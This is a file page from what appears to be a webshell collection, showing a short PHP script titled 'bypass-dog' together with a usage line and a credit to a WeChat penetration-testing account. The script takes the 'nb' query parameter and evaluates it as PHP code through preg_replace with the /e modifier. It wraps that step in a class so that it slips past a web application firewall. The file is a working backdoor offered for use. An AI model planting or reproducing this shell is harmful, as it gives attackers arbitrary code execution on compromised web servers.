webshell/php/bypass-dog-2020-01-30.php
tennc 67733cfcdc
Create bypass-dog-2020-01-30.php
use: http://xxx.xxx.xx/xxx.php?nb=phpinfo()
form: WX公众号 “ 渗透云笔记” Sigsh
新年从过狗开始
2020-01-30 14:30:09 +08:00

12 lines
180 B
PHP

<?php
class SBdog{
public $x;
function dog(){
$this->x=$_GET['nb'];
}
}
$class=new SBdog();
$class->dog();
$a=$class->x;
preg_replace("/dog/e", $a, "I am a sb dog");
?>